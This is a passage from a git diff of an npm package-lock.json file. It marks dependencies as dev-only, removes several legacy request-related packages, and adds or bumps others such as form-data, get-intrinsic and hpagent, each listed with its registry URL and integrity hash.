"https://registry.npmjs.org/detect-newline/-/detect-newline-3.1.0.tgz", - "integrity": "sha512-TLz+x/vEXm/Y7P7wn1EJFNLxYpUD4TgMosxY6fAVJUnJMbupHBOncxyWUG9OpTaH9EBD7uFI5LfEgmMOc54DsA==" + "integrity": "sha512-TLz+x/vEXm/Y7P7wn1EJFNLxYpUD4TgMosxY6fAVJUnJMbupHBOncxyWUG9OpTaH9EBD7uFI5LfEgmMOc54DsA==", + "dev": true }, "diff-sequences": { "version": "29.6.3", "resolved": "https://registry.npmjs.org/diff-sequences/-/diff-sequences-29.6.3.tgz", - "integrity": "sha512-EjePK1srD3P08o2j4f0ExnylqRs5B9tJjcp9t1krH2qRi8CCdsYfwe9JgSLurFBWwq4uOlipzfk5fHNvwFKr8Q==" + "integrity": "sha512-EjePK1srD3P08o2j4f0ExnylqRs5B9tJjcp9t1krH2qRi8CCdsYfwe9JgSLurFBWwq4uOlipzfk5fHNvwFKr8Q==", + "dev": true }, - "ecc-jsbn": { - "version": "0.1.2", - "resolved": "https://registry.npmjs.org/ecc-jsbn/-/ecc-jsbn-0.1.2.tgz", - "integrity": "sha512-eh9O+hwRHNbG4BLTjEl3nw044CkGm5X6LoaCf7LPp7UU8Qrt47JYNi6nPX8xjW97TKGKm1ouctg0QSpZe9qrnw==", + "dunder-proto": { + "version": "1.0.1", + "resolved": "https://registry.npmjs.org/dunder-proto/-/dunder-proto-1.0.1.tgz", + "integrity": "sha512-KIN/nDJBQRcXw0MLVhZE9iQHmG68qAVIBg9CqmUYjmQIhgij9U5MFvrqkUL5FbtyyzZuOeOt0zdeRe4UY7ct+A==", "dev": true, "requires": { - "jsbn": "~0.1.0", - "safer-buffer": "^2.1.0" + "call-bind-apply-helpers": "^1.0.1", + "es-errors": "^1.3.0", + "gopd": "^1.2.0" } }, "ejs": { "version": "3.1.10", "resolved": "https://registry.npmjs.org/ejs/-/ejs-3.1.10.tgz", "integrity": "sha512-UeJmFfOrAQS8OJWPZ4qtgHyWExa088/MtK5UEyoJGFH67cDEXkZSviOiKRCZ4Xij0zxI3JECgYs3oKx+AizQBA==", + "dev": true, "requires": { "jake": "^10.8.5" } @@ -5274,45 +5586,95 @@ "electron-to-chromium": { "version": "1.5.63", "resolved": "https://registry.npmjs.org/electron-to-chromium/-/electron-to-chromium-1.5.63.tgz", - "integrity": "sha512-ddeXKuY9BHo/mw145axlyWjlJ1UBt4WK3AlvkT7W2AbqfRQoacVoRUCF6wL3uIx/8wT9oLKXzI+rFqHHscByaA==" + "integrity": "sha512-ddeXKuY9BHo/mw145axlyWjlJ1UBt4WK3AlvkT7W2AbqfRQoacVoRUCF6wL3uIx/8wT9oLKXzI+rFqHHscByaA==", + "dev": true }, "emittery": { "version": "0.13.1", "resolved": "https://registry.npmjs.org/emittery/-/emittery-0.13.1.tgz", - "integrity": "sha512-DeWwawk6r5yR9jFgnDKYt4sLS0LmHJJi3ZOnb5/JdbYwj3nW+FxQnHIjhBKz8YLC7oRNPVM9NQ47I3CVx34eqQ==" + "integrity": "sha512-DeWwawk6r5yR9jFgnDKYt4sLS0LmHJJi3ZOnb5/JdbYwj3nW+FxQnHIjhBKz8YLC7oRNPVM9NQ47I3CVx34eqQ==", + "dev": true }, "emoji-regex": { "version": "8.0.0", "resolved": "https://registry.npmjs.org/emoji-regex/-/emoji-regex-8.0.0.tgz", - "integrity": "sha512-MSjYzcWNOA0ewAHpz0MxpYFvwg6yjy1NG3xteoqz644VCo/RPgnr1/GGt+ic3iJTzQ8Eu3TdM14SawnVUmGE6A==" + "integrity": "sha512-MSjYzcWNOA0ewAHpz0MxpYFvwg6yjy1NG3xteoqz644VCo/RPgnr1/GGt+ic3iJTzQ8Eu3TdM14SawnVUmGE6A==", + "dev": true + }, + "end-of-stream": { + "version": "1.4.5", + "resolved": "https://registry.npmjs.org/end-of-stream/-/end-of-stream-1.4.5.tgz", + "integrity": "sha512-ooEGc6HP26xXq/N+GCGOT0JKCLDGrq2bQUZrQ7gyrJiZANJ/8YDTxTpQBXGMn+WbIQXNVpyWymm7KYVICQnyOg==", + "dev": true, + "requires": { + "once": "^1.4.0" + } }, "error-ex": { "version": "1.3.2", "resolved": "https://registry.npmjs.org/error-ex/-/error-ex-1.3.2.tgz", "integrity": "sha512-7dFHNmqeFSEt2ZBsCriorKnn3Z2pj+fd9kmI6QoWw4//DL+icEBfc0U7qJCisqrTsKTjw4fNFy2pW9OqStD84g==", + "dev": true, "requires": { "is-arrayish": "^0.2.1" } }, + "es-define-property": { + "version": "1.0.1", + "resolved": "https://registry.npmjs.org/es-define-property/-/es-define-property-1.0.1.tgz", + "integrity": "sha512-e3nRfgfUZ4rNGL232gUgX06QNyyez04KdjFrF+LTRoOXmrOgFKDg4BCdsjW8EnT69eqdYGmRpJwiPVYNrCaW3g==", + "dev": true + }, + "es-errors": { + "version": "1.3.0", + "resolved": "https://registry.npmjs.org/es-errors/-/es-errors-1.3.0.tgz", + "integrity": "sha512-Zf5H2Kxt2xjTvbJvP2ZWLEICxA6j+hAmMzIlypy4xcBg1vKVnx89Wy0GbS+kf5cwCVFFzdCFh2XSCFNULS6csw==", + "dev": true + }, + "es-object-atoms": { + "version": "1.1.1", + "resolved": "https://registry.npmjs.org/es-object-atoms/-/es-object-atoms-1.1.1.tgz", + "integrity": "sha512-FGgH2h8zKNim9ljj7dankFPcICIK9Cp5bm+c2gQSYePhpaG5+esrLODihIorn+Pe6FGJzWhXQotPv73jTaldXA==", + "dev": true, + "requires": { + "es-errors": "^1.3.0" + } + }, + "es-set-tostringtag": { + "version": "2.1.0", + "resolved": "https://registry.npmjs.org/es-set-tostringtag/-/es-set-tostringtag-2.1.0.tgz", + "integrity": "sha512-j6vWzfrGVfyXxge+O0x5sh6cvxAog0a/4Rdd2K36zCMV5eJ+/+tOAngRO8cODMNWbVRdVlmGZQL2YS3yR8bIUA==", + "dev": true, + "requires": { + "es-errors": "^1.3.0", + "get-intrinsic": "^1.2.6", + "has-tostringtag": "^1.0.2", + "hasown": "^2.0.2" + } + }, "escalade": { "version": "3.2.0", "resolved": "https://registry.npmjs.org/escalade/-/escalade-3.2.0.tgz", - "integrity": "sha512-WUj2qlxaQtO4g6Pq5c29GTcWGDyd8itL8zTlipgECz3JesAiiOKotd8JU6otB3PACgG6xkJUyVhboMS+bje/jA==" + "integrity": "sha512-WUj2qlxaQtO4g6Pq5c29GTcWGDyd8itL8zTlipgECz3JesAiiOKotd8JU6otB3PACgG6xkJUyVhboMS+bje/jA==", + "dev": true }, "escape-string-regexp": { "version": "2.0.0", "resolved": "https://registry.npmjs.org/escape-string-regexp/-/escape-string-regexp-2.0.0.tgz", - "integrity": "sha512-UpzcLCXolUWcNu5HtVMHYdXJjArjsF9C0aNnquZYY4uW/Vu0miy5YoWvbV345HauVvcAUnpRuhMMcqTcGOY2+w==" + "integrity": "sha512-UpzcLCXolUWcNu5HtVMHYdXJjArjsF9C0aNnquZYY4uW/Vu0miy5YoWvbV345HauVvcAUnpRuhMMcqTcGOY2+w==", + "dev": true }, "esprima": { "version": "4.0.1", "resolved": "https://registry.npmjs.org/esprima/-/esprima-4.0.1.tgz", - "integrity": "sha512-eGuFFw7Upda+g4p+QHvnW0RyTX/SVeJBDM/gCtMARO0cLuT2HcEKnTPvhjV6aGeqrCB/sbNop0Kszm0jsaWU4A==" - }, + "integrity": "sha512-eGuFFw7Upda+g4p+QHvnW0RyTX/SVeJBDM/gCtMARO0cLuT2HcEKnTPvhjV6aGeqrCB/sbNop0Kszm0jsaWU4A==", + "dev": true + }, "execa": { "version": "5.1.1", "resolved": "https://registry.npmjs.org/execa/-/execa-5.1.1.tgz", "integrity": "sha512-8uSpZZocAZRBAPIEINJj3Lo9HyGitllczc27Eh5YYojjMFMn8yHMDMaUHE2Jqfq05D/wucwI4JGURyXt1vchyg==", + "dev": true, "requires": { "cross-spawn": "^7.0.3", "get-stream": "^6.0.0", @@ -5328,12 +5690,14 @@ "exit": { "version": "0.1.2", "resolved": "https://registry.npmjs.org/exit/-/exit-0.1.2.tgz", - "integrity": "sha512-Zk/eNKV2zbjpKzrsQ+n1G6poVbErQxJ0LBOJXaKZ1EViLzH+hrLu9cdXI4zw9dBQJslwBEpbQ2P1oS7nDxs6jQ==" + "integrity": "sha512-Zk/eNKV2zbjpKzrsQ+n1G6poVbErQxJ0LBOJXaKZ1EViLzH+hrLu9cdXI4zw9dBQJslwBEpbQ2P1oS7nDxs6jQ==", + "dev": true }, "expect": { "version": "29.7.0", "resolved": "https://registry.npmjs.org/expect/-/expect-29.7.0.tgz", "integrity": "sha512-2Zks0hf1VLFYI1kbh0I5jP3KHHyCHpkfyHBzsSXRFgl/Bg9mWYfMW8oD+PdMPlEwy5HNsR9JutYy6pMeOh61nw==", + "dev": true, "requires": { "@jest/expect-utils": "^29.7.0", "jest-get-type": "^29.6.3", @@ -5342,33 +5706,23 @@ "jest-util": "^29.7.0" } }, - "extend": { - "version": "3.0.2", - "resolved": "https://registry.npmjs.org/extend/-/extend-3.0.2.tgz", - "integrity": "sha512-fjquC59cD7CyW6urNXK0FBufkZcoiGG80wTuPujX590cB5Ttln20E2UB4S/WARVqhXffZl2LNgS+gQdPIIim/g==", - "dev": true - }, - "extsprintf": { - "version": "1.3.0", - "resolved": "https://registry.npmjs.org/extsprintf/-/extsprintf-1.3.0.tgz", - "integrity": "sha512-11Ndz7Nv+mvAC1j0ktTa7fAb0vLyGGX+rMHNBYQviQDGU0Hw7lhctJANqbPhu9nV9/izT/IntTgZ7Im/9LJs9g==", - "dev": true - }, - "fast-deep-equal": { - "version": "3.1.3", - "resolved": "https://registry.npmjs.org/fast-deep-equal/-/fast-deep-equal-3.1.3.tgz", - "integrity": "sha512-f3qQ9oQy9j2AhBe/H9VC91wLmKBCCU/gDOnKNAYG5hswO7BLKj09Hc5HYNz9cGI++xlpDCIgDaitVs03ATR84Q==", + "fast-fifo": { + "version": "1.3.2", + "resolved": "https://registry.npmjs.org/fast-fifo/-/fast-fifo-1.3.2.tgz", + "integrity": "sha512-/d9sfos4yxzpwkDkuN7k2SqFKtYNmCTzgfEpz82x34IM9/zc8KGxQoXg1liNC/izpRM/MBdt44Nmx41ZWqk+FQ==", "dev": true }, "fast-json-stable-stringify": { "version": "2.1.0", "resolved": "https://registry.npmjs.org/fast-json-stable-stringify/-/fast-json-stable-stringify-2.1.0.tgz", - "integrity": "sha512-lhd/wF+Lk98HZoTCtlVraHtfh5XYijIjalXck7saUtuanSDyLMxnHhSXEDJqHxD7msR8D0uCmqlkwjCV8xvwHw==" + "integrity": "sha512-lhd/wF+Lk98HZoTCtlVraHtfh5XYijIjalXck7saUtuanSDyLMxnHhSXEDJqHxD7msR8D0uCmqlkwjCV8xvwHw==", + "dev": true }, "fb-watchman": { "version": "2.0.2", "resolved": "https://registry.npmjs.org/fb-watchman/-/fb-watchman-2.0.2.tgz", "integrity": "sha512-p5161BqbuCaSnB8jIbzQHOlpgsPmK5rJVDfDKO91Axs5NC1uu3HRQm6wt9cd9/+GtQQIO53JdGXXoyDpTAsgYA==", + "dev": true, "requires": { "bser": "2.1.1" } @@ -5377,14 +5731,16 @@ "version": "1.0.4", "resolved": "https://registry.npmjs.org/filelist/-/filelist-1.0.4.tgz", "integrity": "sha512-w1cEuf3S+DrLCQL7ET6kz+gmlJdbq9J7yXCSjK/OZCPA+qEN1WyF4ZAf0YYJa4/shHJra2t/d/r8SV4Ji+x+8Q==", + "dev": true, "requires": { "minimatch": "^5.0.1" }, "dependencies": { "brace-expansion": { - "version": "2.0.1", - "resolved": "https://registry.npmjs.org/brace-expansion/-/brace-expansion-2.0.1.tgz", - "integrity": "sha512-XnAIvQ8eM+kC6aULx6wuQiwVsnzsi9d3WxzV3FpWTGA19F621kwdbsAcFKXgKUHZWsy+mY6iL1sHTxWEFCytDA==", + "version": "2.0.2", + "resolved": "https://registry.npmjs.org/brace-expansion/-/brace-expansion-2.0.2.tgz", + "integrity": "sha512-Jt0vHyM+jmUBqojB7E1NIYadt0vI0Qxjxd2TErW94wDz+E2LAm5vKMXXwg6ZZBTHPuUlDgQHKXvjGBdfcF1ZDQ==", + "dev": true, "requires": { "balanced-match": "^1.0.0" } @@ -5393,6 +5749,7 @@ "version": "5.1.6", "resolved": "https://registry.npmjs.org/minimatch/-/minimatch-5.1.6.tgz", "integrity": "sha512-lKwV/1brpG6mBUFHtb7NUmtABCb2WZZmm2wNiOA5hAb8VdCS4B3dtMWyvcoViccwAW/COERjXLt0zP1zXUN26g==", + "dev": true, "requires": { "brace-expansion": "^2.0.1" } @@ -5403,6 +5760,7 @@ "version": "7.1.1", "resolved": "https://registry.npmjs.org/fill-range/-/fill-range-7.1.1.tgz", "integrity": "sha512-YsGpe3WHLK8ZYi4tWDg2Jy3ebRz2rXowDxnld4bkQB00cc/1Zw9AWnC0i9ztDJitivtQvaI9KaLyKrc+hBW0yg==", + "dev": true, "requires": { "to-regex-range": "^5.0.1" } @@ -5411,103 +5769,101 @@ "version": "4.1.0", "resolved": "https://registry.npmjs.org/find-up/-/find-up-4.1.0.tgz", "integrity": "sha512-PpOwAdQ/YlXQ2vj8a3h8IipDuYRi3wceVQQGYWxNINccq40Anw7BlsEXCMbt1Zt+OLA6Fq9suIpIWD0OsnISlw==", + "dev": true, "requires": { "locate-path": "^5.0.0", "path-exists": "^4.0.0" } }, - "forever-agent": { - "version": "0.6.1", - "resolved": "https://registry.npmjs.org/forever-agent/-/forever-agent-0.6.1.tgz", - "integrity": "sha512-j0KLYPhm6zeac4lz3oJ3o65qvgQCcPubiyotZrXqEaG4hNagNYO8qdlUrX5vwqv9ohqeT/Z3j6+yW067yWWdUw==", - "dev": true - }, "form-data": { - "version": "2.5.1", - "resolved": "https://registry.npmjs.org/form-data/-/form-data-2.5.1.tgz", - "integrity": "sha512-m21N3WOmEEURgk6B9GLOE4RuWOFf28Lhh9qGYeNlGq4VDXUlJy2th2slBNU8Gp8EzloYZOibZJ7t5ecIrFSjVA==", + "version": "4.0.3", + "resolved": "https://registry.npmjs.org/form-data/-/form-data-4.0.3.tgz", + "integrity": "sha512-qsITQPfmvMOSAdeyZ+12I1c+CKSstAFAwu+97zrnWAbIr5u8wfsExUzCesVLC8NgHuRUqNN4Zy6UPWUTRGslcA==", "dev": true, "requires": { "asynckit": "^0.4.0", - "combined-stream": "^1.0.6", + "combined-stream": "^1.0.8", + "es-set-tostringtag": "^2.1.0", + "hasown": "^2.0.2", "mime-types": "^2.1.12" } }, - "fs-minipass": { - "version": "2.1.0", - "resolved": "https://registry.npmjs.org/fs-minipass/-/fs-minipass-2.1.0.tgz", - "integrity": "sha512-V/JgOLFCS+R6Vcq0slCuaeWEdNC3ouDlJMNIsacH2VtALiu9mV4LPrHc5cDl8k5aw6J8jwgWWpiTo5RYhmIzvg==", - "dev": true, - "requires": { - "minipass": "^3.0.0" - }, - "dependencies": { - "minipass": { - "version": "3.3.6", - "resolved": "https://registry.npmjs.org/minipass/-/minipass-3.3.6.tgz", - "integrity": "sha512-DxiNidxSEK+tHG6zOIklvNOwm3hvCrbUrdtzY74U6HKTJxvIDfOUL5W5P2Ghd3DTkhhKPYGqeNUIh5qcM4YBfw==", - "dev": true, - "requires": { - "yallist": "^4.0.0" - } - }, - "yallist": { - "version": "4.0.0", - "resolved": "https://registry.npmjs.org/yallist/-/yallist-4.0.0.tgz", - "integrity": "sha512-3wdGidZyq5PB084XLES5TpOSRA3wjXAlIWMhum2kRcv/41Sn2emQ0dycQW4uZXLejwKvg6EsvbdlVL+FYEct7A==", - "dev": true - } - } - }, "fs.realpath": { "version": "1.0.0", "resolved": "https://registry.npmjs.org/fs.realpath/-/fs.realpath-1.0.0.tgz", - "integrity": "sha512-OO0pH2lK6a0hZnAdau5ItzHPI6pUlvI7jMVnxUQRtw4owF2wk8lOSabtGDCTP4Ggrg2MbGnWO9X8K1t4+fGMDw==" + "integrity": "sha512-OO0pH2lK6a0hZnAdau5ItzHPI6pUlvI7jMVnxUQRtw4owF2wk8lOSabtGDCTP4Ggrg2MbGnWO9X8K1t4+fGMDw==", + "dev": true }, "fsevents": { "version": "2.3.3", "resolved": "https://registry.npmjs.org/fsevents/-/fsevents-2.3.3.tgz", "integrity": "sha512-5xoDfX+fL7faATnagmWPpbFtwh/R77WmMMqqHGS65C3vvB0YHrgF+B1YmZ3441tMj5n63k0212XNoJwzlhffQw==", + "dev": true, "optional": true }, "function-bind": { "version": "1.1.2", "resolved": "https://registry.npmjs.org/function-bind/-/function-bind-1.1.2.tgz", - "integrity": "sha512-7XHNxH7qX9xG5mIwxkhumTox/MIRNcOgDrxWsMt2pAr23WHp6MrRlN7FBSFpCpr+oVO0F744iUgR82nJMfG2SA==" + "integrity": "sha512-7XHNxH7qX9xG5mIwxkhumTox/MIRNcOgDrxWsMt2pAr23WHp6MrRlN7FBSFpCpr+oVO0F744iUgR82nJMfG2SA==", + "dev": true }, "gensync": { "version": "1.0.0-beta.2", "resolved": "https://registry.npmjs.org/gensync/-/gensync-1.0.0-beta.2.tgz", - "integrity": "sha512-3hN7NaskYvMDLQY55gnW3NQ+mesEAepTqlg+VEbj7zzqEMBVNhzcGYYeqFo/TlYz6eQiFcp1HcsCZO+nGgS8zg==" + "integrity": "sha512-3hN7NaskYvMDLQY55gnW3NQ+mesEAepTqlg+VEbj7zzqEMBVNhzcGYYeqFo/TlYz6eQiFcp1HcsCZO+nGgS8zg==", + "dev": true }, "get-caller-file": { "version": "2.0.5", "resolved": "https://registry.npmjs.org/get-caller-file/-/get-caller-file-2.0.5.tgz", - "integrity": "sha512-DyFP3BM/3YHTQOCUL/w0OZHR0lpKeGrxotcHWcqNEdnltqFwXVfhEBQ94eIo34AfQpo0rGki4cyIiftY06h2Fg==" + "integrity": "sha512-DyFP3BM/3YHTQOCUL/w0OZHR0lpKeGrxotcHWcqNEdnltqFwXVfhEBQ94eIo34AfQpo0rGki4cyIiftY06h2Fg==", + "dev": true + }, + "get-intrinsic": { + "version": "1.3.0", + "resolved": "https://registry.npmjs.org/get-intrinsic/-/get-intrinsic-1.3.0.tgz", + "integrity": "sha512-9fSjSaos/fRIVIp+xSJlE6lfwhES7LNtKaCBIamHsjr2na1BiABJPo0mOjjz8GJDURarmCPGqaiVg5mfjb98CQ==", + "dev": true, + "requires": { + "call-bind-apply-helpers": "^1.0.2", + "es-define-property": "^1.0.1", + "es-errors": "^1.3.0", + "es-object-atoms": "^1.1.1", + "function-bind": "^1.1.2", + "get-proto": "^1.0.1", + "gopd": "^1.2.0", + "has-symbols": "^1.1.0", + "hasown": "^2.0.2", + "math-intrinsics": "^1.1.0" + } }, "get-package-type": { "version": "0.1.0", "resolved": "https://registry.npmjs.org/get-package-type/-/get-package-type-0.1.0.tgz", - "integrity": "sha512-pjzuKtY64GYfWizNAJ0fr9VqttZkNiK2iS430LtIHzjBEr6bX8Am2zm4sW4Ro5wjWW5cAlRL1qAMTcXbjNAO2Q==" - }, - "get-stream": { - "version": "6.0.1", - "resolved": "https://registry.npmjs.org/get-stream/-/get-stream-6.0.1.tgz", - "integrity": "sha512-ts6Wi+2j3jQjqi70w5AlN8DFnkSwC+MqmxEzdEALB2qXZYV3X/b1CTfgPLGJNMeAWxdPfU8FO1ms3NUfaHCPYg==" + "integrity": "sha512-pjzuKtY64GYfWizNAJ0fr9VqttZkNiK2iS430LtIHzjBEr6bX8Am2zm4sW4Ro5wjWW5cAlRL1qAMTcXbjNAO2Q==", + "dev": true }, - "getpass": { - "version": "0.1.7", - "resolved": "https://registry.npmjs.org/getpass/-/getpass-0.1.7.tgz", - "integrity": "sha512-0fzj9JxOLfJ+XGLhR8ze3unN0KZCgZwiSSDz168VERjK8Wl8kVSdcu2kspd4s4wtAa1y/qrVRiAA0WclVsu0ng==", + "get-proto": { + "version": "1.0.1", + "resolved": "https://registry.npmjs.org/get-proto/-/get-proto-1.0.1.tgz", + "integrity": "sha512-sTSfBjoXBp89JvIKIefqw7U2CCebsc74kiY6awiGogKtoSGbgjYE/G/+l9sF3MWFPNc9IcoOC4ODfKHfxFmp0g==", "dev": true, "requires": { - "assert-plus": "^1.0.0" + "dunder-proto": "^1.0.1", + "es-object-atoms": "^1.0.0" } }, + "get-stream": { + "version": "6.0.1", + "resolved": "https://registry.npmjs.org/get-stream/-/get-stream-6.0.1.tgz", + "integrity": "sha512-ts6Wi+2j3jQjqi70w5AlN8DFnkSwC+MqmxEzdEALB2qXZYV3X/b1CTfgPLGJNMeAWxdPfU8FO1ms3NUfaHCPYg==", + "dev": true + }, "glob": { "version": "7.2.3", "resolved": "https://registry.npmjs.org/glob/-/glob-7.2.3.tgz", "integrity": "sha512-nFR0zLpU2YCaRxwoCJvL6UvCH2JFyFVIvwTLsIf21AuHlMskA1hhTdk+LlYJtOlYt9v6dvszD2BGRqBL+iQK9Q==", + "dev": true, "requires": { "fs.realpath": "^1.0.0", "inflight": "^1.0.4", @@ -5520,67 +5876,74 @@ "globals": { "version": "11.12.0", "resolved": "https://registry.npmjs.org/globals/-/globals-11.12.0.tgz", - "integrity": "sha512-WOBp/EEGUiIsJSp7wcv/y6MO+lV9UoncWqxuFfm8eBwzWNgyfBd6Gz+IeKQ9jCmyhoH99g15M3T+QaVHFjizVA==" + "integrity": "sha512-WOBp/EEGUiIsJSp7wcv/y6MO+lV9UoncWqxuFfm8eBwzWNgyfBd6Gz+IeKQ9jCmyhoH99g15M3T+QaVHFjizVA==", + "dev": true + }, + "gopd": { + "version": "1.2.0", + "resolved": "https://registry.npmjs.org/gopd/-/gopd-1.2.0.tgz", + "integrity": "sha512-ZUKRh6/kUFoAiTAtTYPZJ3hw9wNxx+BIBOijnlG9PnrJsCcSjs1wyyD6vJpaYtgnzDrKYRSqf3OO6Rfa93xsRg==", + "dev": true }, "graceful-fs": { "version": "4.2.11", "resolved": "https://registry.npmjs.org/graceful-fs/-/graceful-fs-4.2.11.tgz", - "integrity": "sha512-RbJ5/jmFcNNCcDV5o9eTnBLJ/HszWV0P73bc+Ff4nS/rJj+YaS6IGyiOL0VoBYX+l1Wrl3k63h/KrH+nhJ0XvQ==" + "integrity": "sha512-RbJ5/jmFcNNCcDV5o9eTnBLJ/HszWV0P73bc+Ff4nS/rJj+YaS6IGyiOL0VoBYX+l1Wrl3k63h/KrH+nhJ0XvQ==", + "dev": true }, - "har-schema": { - "version": "2.0.0", - "resolved": "https://registry.npmjs.org/har-schema/-/har-schema-2.0.0.tgz", - "integrity": "sha512-Oqluz6zhGX8cyRaTQlFMPw80bSJVG2x/cFb8ZPhUILGgHka9SsokCCOQgpveePerqidZOrT14ipqfJb7ILcW5Q==", + "has-flag": { + "version": "4.0.0", + "resolved": "https://registry.npmjs.org/has-flag/-/has-flag-4.0.0.tgz", + "integrity": "sha512-EykJT/Q1KjTWctppgIAgfSO0tKVuZUjhgMr17kqTumMl6Afv3EISleU7qZUzoXDFTAHTDC4NOoG/ZxU3EvlMPQ==", + "dev": true + }, + "has-symbols": { + "version": "1.1.0", + "resolved": "https://registry.npmjs.org/has-symbols/-/has-symbols-1.1.0.tgz", + "integrity": "sha512-1cDNdwJ2Jaohmb3sg4OmKaMBwuC48sYni5HUw2DvsC8LjGTLK9h+eb1X6RyuOHe4hT0ULCW68iomhjUoKUqlPQ==", "dev": true }, - "har-validator": { - "version": "5.1.5", - "resolved": "https://registry.npmjs.org/har-validator/-/har-validator-5.1.5.tgz", - "integrity": "sha512-nmT2T0lljbxdQZfspsno9hgrG3Uir6Ks5afism62poxqBM6sDnMEuPmzTq8XN0OEwqKLLdh1jQI3qyE66Nzb3w==", + "has-tostringtag": { + "version": "1.0.2", + "resolved": "https://registry.npmjs.org/has-tostringtag/-/has-tostringtag-1.0.2.tgz", + "integrity": "sha512-NqADB8VjPFLM2V0VvHUewwwsw0ZWBaIdgo+ieHtK3hasLz4qeCRjYcqfB6AQrBggRKppKF8L52/VqdVsO47Dlw==", "dev": true, "requires": { - "ajv": "^6.12.3", - "har-schema": "^2.0.0" + "has-symbols": "^1.0.3" } }, - "has-flag": { - "version": "4.0.0", - "resolved": "https://registry.npmjs.org/has-flag/-/has-flag-4.0.0.tgz", - "integrity": "sha512-EykJT/Q1KjTWctppgIAgfSO0tKVuZUjhgMr17kqTumMl6Afv3EISleU7qZUzoXDFTAHTDC4NOoG/ZxU3EvlMPQ==" - }, "hasown": { "version": "2.0.2", "resolved": "https://registry.npmjs.org/hasown/-/hasown-2.0.2.tgz", "integrity": "sha512-0hJU9SCPvmMzIBdZFqNPXWa6dqh7WdH0cII9y+CyS8rG3nL48Bclra9HmKhVVUHyPWNH5Y7xDwAB7bfgSjkUMQ==", + "dev": true, "requires": { "function-bind": "^1.1.2" } }, + "hpagent": { + "version": "1.2.0", + "resolved": "https://registry.npmjs.org/hpagent/-/hpagent-1.2.0.tgz", + "integrity": "sha512-A91dYTeIB6NoXG+PxTQpCCDDnfHsW9kc06Lvpu1TEe9gnd6ZFeiBoRO9JvzEv6xK7EX97/dUE8g/vBMTqTS3CA==", + "dev": true + }, "html-escaper": { "version": "2.0.2", "resolved": "https://registry.npmjs.org/html-escaper/-/html-escaper-2.0.2.tgz", - "integrity": "sha512-H2iMtd0I4Mt5eYiapRdIDjp+XzelXQ0tFE4JS7YFwFevXXMmOp9myNrUvCg0D6ws8iqkRPBfKHgbwig1SmlLfg==" - }, - "http-signature": { - "version": "1.2.0", - "resolved": "https://registry.npmjs.org/http-signature/-/http-signature-1.2.0.tgz", - "integrity": "sha512-CAbnr6Rz4CYQkLYUtSNXxQPUH2gK8f3iWexVlsnMeD+GjlsQ0Xsy1cOX+mN3dtxYomRy21CiOzU8Uhw6OwncEQ==", - "dev": true, - "requires": { - "assert-plus": "^1.0.0", - "jsprim": "^1.2.2", - "sshpk": "^1.7.0" - } + "integrity": "sha512-H2iMtd0I4Mt5eYiapRdIDjp+XzelXQ0tFE4JS7YFwFevXXMmOp9myNrUvCg0D6ws8iqkRPBfKHgbwig1SmlLfg==", + "dev": true }, "human-signals": { "version": "2.1.0", "resolved": "https://registry.npmjs.org/human-signals/-/human-signals-2.1.0.tgz", - "integrity": "sha512-B4FFZ6q/T2jhhksgkbEW3HBvWIfDW85snkQgawt07S7J5QXTk6BkNV+0yAeZrM5QpMAdYlocGoljn0sJ/WQkFw==" + "integrity": "sha512-B4FFZ6q/T2jhhksgkbEW3HBvWIfDW85snkQgawt07S7J5QXTk6BkNV+0yAeZrM5QpMAdYlocGoljn0sJ/WQkFw==", + "dev": true }, "import-local": { "version": "3.2.0", "resolved": "https://registry.npmjs.org/import-local/-/import-local-3.2.0.tgz", "integrity": "sha512-2SPlun1JUPWoM6t3F0dw0FkCF/jWY8kttcY4f599GLTSjh2OCuuhdTkJQsEcZzBqbXZGKMK2OqW1oZsjtf/gQA==", + "dev": true, "requires": { "pkg-dir": "^4.2.0", "resolve-cwd": "^3.0.0" @@ -5589,12 +5952,14 @@ "imurmurhash": { "version": "0.1.4", "resolved": "https://registry.npmjs.org/imurmurhash/-/imurmurhash-0.1.4.tgz", - "integrity": "sha512-JmXMZ6wuvDmLiHEml9ykzqO6lwFbof0GG4IkcGaENdCRDDmMVnny7s5HsIgHCbaq0w2MyPhDqkhTUgS2LU2PHA==" + "integrity": "sha512-JmXMZ6wuvDmLiHEml9ykzqO6lwFbof0GG4IkcGaENdCRDDmMVnny7s5HsIgHCbaq0w2MyPhDqkhTUgS2LU2PHA==", + "dev": true }, "inflight": { "version": "1.0.6", "resolved": "https://registry.npmjs.org/inflight/-/inflight-1.0.6.tgz", "integrity": "sha512-k92I/b08q4wvFscXCLvqfsHCrjrF7yiXsQuIVvVE7N82W3+aqpzuUdBbfhWcy/FZR3/4IgflMgKLOsvPDrGCJA==", + "dev": true, "requires": { "once": "^1.3.0", "wrappy": "1" @@ -5603,17 +5968,38 @@ "inherits": { "version": "2.0.4", "resolved": "https://registry.npmjs.org/inherits/-/inherits-2.0.4.tgz", - "integrity": "sha512-k/vGaX4/Yla3WzyMCvTQOXYeIHvqOKtnqBduzTHpzpQZzAskKMhZ2K+EnBiSM9zGSoIFeMpXKxa4dYeZIQqewQ==" + "integrity": "sha512-k/vGaX4/Yla3WzyMCvTQOXYeIHvqOKtnqBduzTHpzpQZzAskKMhZ2K+EnBiSM9zGSoIFeMpXKxa4dYeZIQqewQ==", + "dev": true + }, + "ip-address": { + "version": "9.0.5", + "resolved": "https://registry.npmjs.org/ip-address/-/ip-address-9.0.5.tgz", + "integrity": "sha512-zHtQzGojZXTwZTHQqra+ETKd4Sn3vgi7uBmlPoXVWZqYvuKmtI0l/VZTjqGmJY9x88GGOaZ9+G9ES8hC4T4X8g==", + "dev": true, + "requires": { + "jsbn": "1.1.0", + "sprintf-js": "^1.1.3" + }, + "dependencies": { + "sprintf-js": { + "version": "1.1.3", + "resolved": "https://registry.npmjs.org/sprintf-js/-/sprintf-js-1.1.3.tgz", + "integrity": "sha512-Oo+0REFV59/rz3gfJNKQiBlwfHaSESl1pcGyABQsnnIfWOFt6JNj5gCog2U6MLZ//IGYD+nA8nI+mTShREReaA==", + "dev": true + } + } }, "is-arrayish": { "version": "0.2.1", "resolved": "https://registry.npmjs.org/is-arrayish/-/is-arrayish-0.2.1.tgz", - "integrity": "sha512-zz06S8t0ozoDXMG+ube26zeCTNXcKIPJZJi8hBrF4idCLms4CG9QtK7qBl1boi5ODzFpjswb5JPmHCbMpjaYzg==" + "integrity": "sha512-zz06S8t0ozoDXMG+ube26zeCTNXcKIPJZJi8hBrF4idCLms4CG9QtK7qBl1boi5ODzFpjswb5JPmHCbMpjaYzg==", + "dev": true }, "is-core-module": { "version": "2.15.1", "resolved": "https://registry.npmjs.org/is-core-module/-/is-core-module-2.15.1.tgz", "integrity": 